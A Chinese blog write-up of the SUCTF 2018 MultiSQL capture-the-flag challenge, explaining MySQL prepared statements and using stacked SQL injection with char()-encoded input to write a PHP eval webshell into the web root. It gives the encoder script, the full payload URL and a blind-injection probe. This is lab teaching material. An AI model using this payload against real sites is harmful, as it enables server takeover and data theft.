[SUCTF 2018]MultiSQL-MySQL预处理学习

最新推荐文章于 2024-08-12 16:32:45 发布
最新推荐文章于 2024-08-12 16:32:45 发布
阅读量430 收藏 1
点赞数
分类专栏: sql注入 web学习 文章标签: mysql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/116652054
版权

[SUCTF 2018]MultiSQL-MySQL预处理学习
进入题目后,注册账户登录
在这里插入图片描述
编辑头像可以上传文件,但是上传了php文件还是会变成jpg格式
在这里插入图片描述
再看用户信息这里,id=2那里可以随意更改,存在越权,1就是admin
在这里插入图片描述
这里接下来要用到MySQL的预处理,参考文章
set

MariaDB [(none)]> set @a='select version()';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> select @a;
+------------------+
| @a               |
+------------------+
| select version() |
+------------------+

set 的作用就是定义一个变量,变量的命名必须是@开头。

prepare和execute
prepare语句用于预定义一个语句,并可以指定预定义语句名称。execute则是执行预定义语句。

prepare prepare_name from “sql语句”

execute prepare_name

示例

MariaDB [(none)]> prepare t from @a;
Query OK, 0 rows affected (0.00 sec)
Statement prepared

MariaDB [(none)]> execute t;
+-------------------+
| version()         |
+-------------------+
| 10.1.29-MariaDB-6 |
+-------------------+
1 row in set (0.00 sec)

结合起来利用就是

MariaDB [(none)]> set @a='select version()';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> prepare t from @a;
Query OK, 0 rows affected (0.00 sec)
Statement prepared

MariaDB [(none)]> execute t;
+-------------------+
| version()         |
+-------------------+
| 10.1.29-MariaDB-6 |
+-------------------+
1 row in set (0.00 sec)

这题fuzz测试后发现过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句

select ‘<?php eval($_POST[_]);?>’ into outfile ‘/var/www/html/favicon/shell.php’;

使用脚本编程十进制:

str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str=len(str)
for i in range(0,len_str):
	if i == 0:
		print('char(%s'%ord(str[i]),end="")
	else:
		print(',%s'%ord(str[i]),end="")
print(')')

结果为

char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

payload

?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;

利用该payload写入shell
在这里插入图片描述

接下来访问shell所在的位置并发送命令
在这里插入图片描述
flag应该在WelL_Th1s_14_fl4g

参考文章:https://blog.csdn.net/qq_45691294/article/details/109001695

lmonstergg
关注
专栏目录
人工智能-项目实践-数据预处理-多线程(线程数可调节),处理千万级mysql数据表,预处理+数据迁移到新表
03-04
在IT行业中,数据预处理是数据分析和机器学习项目的关键步骤,尤其当面对大规模数据库时,如千万级的MySQL数据表。本项目实践聚焦于利用多线程技术来提高数据处理和迁移的效率,同时允许线程数的动态调节,以适应...
[SUCTF 2018]MultiSQL(预处理)
qq_62046696的博客
12-31 1049
通过命令获得flag ,可能是我做题少吧,第一次 看见sql中采用预处理然后写入webshell,最后得flag,反过来分析,通过上传文件给了一个可读写权限得路径,一步步收集信息,只能说自己太菜了。wp是通过盲注,然后一个个读取user.php的源码,我简单的跑了一下半个小时也跑不出来,所以我觉得这种方法并不太实用。异或可以然后试试,发现呃呃呃应该是过滤了,fuzz发现就剩了几个符号包括分号,想到了堆叠注入分号链接。为什么有写入权限呢,因为文件上传都是传到了这个目录的里面,所以有可写的权限。
BUUCTF--[SUCTF 2018]MultiSQL
qq_46263951的博客
07-28 419
进入之后是这样的页面,我们先来注册一个帐号 查看用户信息 在?id=后存在一个sql盲注,我们来尝试一下?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2 经过fuzz测试后发现这里过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句select '<?php eval($_POST[.
[SUCTF 2018]MultiSQL
最新发布
m0_64849639的博客
08-12 312
MYSQL预处理、堆叠注入
[SUCTF 2018]MultiSQL-MySQL预处理
qq_61142406的博客
05-26 296
MySQL传统处理: 客户端准备sql语句 发送sql语句到MySQL服务器 MySQL服务器执行sql语句 服务器执行结果返回客户端 预处理基本策略: 将sql语句强制一分为二: 第一部分为前面相同命令和结构部分 第二部分为后面可变数据部分 首先将前面的sql语句发送给MySQL服务器,让其先执行溢出预处理(并没有真正的执行)第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示,比如问号? 不带参数的预处理 准备预处理语句 prepare 语句名称 from “预处理sql
[SUCTF 2018]MultiSQL(mysql预编译)
paidx0
07-12 401
[SUCTF 2018]MultiSQL(mysql预编译)
人工智能-项目实践-数据预处理-SQL语句分析、内置变量预处理、命名参数支持以及关系数据库访问与写入
03-04
在人工智能项目实践中,数据预处理是至关重要的一步,它涵盖了多个方面,如SQL语句的运用、内置变量的预处理、命名参数的支持以及关系数据库的访问与写入。这些环节对于确保数据的质量、准确性和可用性起着决定性的...
人工智能-项目实践-数据预处理-基于SpringBoot、MyBatisPlus、ElementUI、G2Plot、Echart
03-04
基于SpringBoot、MyBatisPlus、ElementUI、G2Plot、Echarts等技术栈的大屏设计器,具备大屏目录管理、大屏设计、大屏预览能力,支持MySQL、Oracle、PostgreSQL、JSON等数据集接入,对于复杂数据处理还可以使用Groovy...
DBD-mysql-4.050.tar.gz
10-17
标题 "DBD-mysql-4.050.tar.gz" 暗示着这是一个与数据库接口相关的软件包,特别是用于Perl编程语言的DBD(Database Driver for Perl)模块,用于连接和操作MySQL数据库。"4.050"是这个模块的版本号,通常代表着软件...
理解Mysql prepare预处理语句
09-10
MySQL PREPARE预处理语句详解】 MySQL的PREPARE预处理语句是一种提高数据库操作性能和安全性的重要工具,尤其适用于需要重复执行相同结构但参数不同的SQL语句的情况。预处理语句的工作原理是先定义一个SQL模板,...
buuctf-web-[SUCTF 2018]MultiSQL1
mlws1900的博客
03-11 600
flag{1cc63c44-f1b0-40c0-a64e-fdc8bfe4f503}删删改改四五回,哥们只是想混个勋章,太折磨人了,看到我文章有罗里吧嗦的地方见谅,我其他文章都是以精简为主,不在乎文章分数,为了这个勋章,我只好车轱辘话转来转去(这一段就是这个作用)可以读/var/www/html/index.php文件,读取/var/www/html/user/user.php文件(这种方法跑十几分钟也跑不出来)存在各种限制,select,union,直接用char绕过(太菜,用其他绕过写马失败)
[SUCTF 2018]MultiSQL MYSQL 预处理
m0_64180167的博客
12-13 837
然后我们开始fuzz 发现 select ,union 都没了。首先这道题需要预处理写马 之前在ctfshow中学习预处理。发现可以闭合 所以这里是存在堆叠注入的。这里就实现了绕过 并且执行了命令。首先我们开始判断是否存在注入。所以我们看看能不能写木马。
BUUCTF:[SUCTF 2018]MultiSQL
末初的CSDN博客
04-01 2433
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
buu-[SUCTF 2018]MultiSQL
qaq517384的博客
10-23 279
打开环境,只有登录和注册界面,admin已存在,随便注册一个算了 登录后有两个选项 头像界面就是一个文件上传,象征性的传一张,得到一个文件夹,可以正常访问 用户信息界面还有url的user/user.php?id=2 很明显的sql注入(如果考点是注入的话) 看一眼题目,然后默默的吧id改成1,能看到admin但是没有用 测了一下字符型和整形注入都没回显 脚本不知道为什么没有返回值,浏览器是能成功访问的 ?id=1^(ascii(mid(user(),1,1))>0) 就手注了一下user()是
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 741
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在注册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了 二、 学到的&&am
mysql预处理
05-26
MySQL预处理是一种提高SQL查询性能和安全性的技术。它通过将SQL语句分为两个部分来实现:预处理和执行。预处理阶段将SQL语句发送到MySQL服务器,MySQL服务器将其解析并进行语法分析,然后将其编译成一种内部格式。在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值